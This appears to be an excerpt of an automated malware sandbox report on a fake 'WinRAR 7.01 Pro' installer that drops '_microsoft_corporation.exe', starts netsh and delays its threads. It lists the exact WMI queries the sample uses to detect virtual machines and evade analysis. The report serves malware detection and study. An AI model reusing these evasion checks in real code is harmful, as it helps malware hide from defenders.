Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Memory allocated: 2780000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Memory allocated: 26D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Memory allocated: 26286F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Memory allocated: 2628B370000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Memory allocated: 6A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Memory allocated: 27B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Memory allocated: 2610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Memory allocated: 5700000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Memory allocated: 6700000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599216	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597763	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596668	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 595969	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Window / User API: threadDelayed 2079			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Window / User API: threadDelayed 7582			Jump to behavior

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe TID: 7512	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599216s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -599000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598531s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597763s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597453s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597344s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596890s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596781s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596668s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596538s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596422s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596312s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596203s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -596094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -595969s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99532s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99407s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99226s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -99109s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -98997s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -98891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -98766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -98657s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe TID: 1804	Thread sleep time: -98532s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor

Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BB34D0 SendDlgItemMessageW,GetDlgItem,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,	1_2_00007FF6C3BB34D0
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BC9B40 FindFirstFileExW,	1_2_00007FF6C3BC9B40
Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe	Code function: 1_2_00007FF6C3BA1F08 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	1_2_00007FF6C3BA1F08

Source: C:\Users\user\AppData\Local\Temp\winrar_x64_701ar.exe

Code function: 1_2_00007FF6C3BB88A0 VirtualQuery,GetSystemInfo,

1_2_00007FF6C3BB88A0

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599216	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 599000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598531	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597984	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597875	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597763	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597453	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597344	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596890	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596781	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596668	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596538	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596422	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596312	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 596094	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 595969	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99641	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99532	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99407	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99226	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 99109	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 98997	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 98891	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 98766	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 98657	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_microsoft_corporation.exe	Thread delayed: delay time: 98532	Jump to behavior

Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\WinRAR 7.01 Pro.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\
Source: winrar_x64_701ar.exe, 00000001.00000002.2995358335.0000025A83034000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}si
Source: winrar_x64_701ar.exe, 00000001.00000003.2948327551.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B695000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\S
Source: winrar_x64_701ar.exe, 00000001.00000003.2557359939.000002628B6B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\9
Source: winrar_x64_701ar.exe, 00000001.00000003.2808837699.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\MYqj
Source: winrar_x64_701ar.exe, 00000001.00000003.2247409938.000002628B6B5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: winrar_x64_701ar.exe, 00000001.00000002.2999504985.000002628B70F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
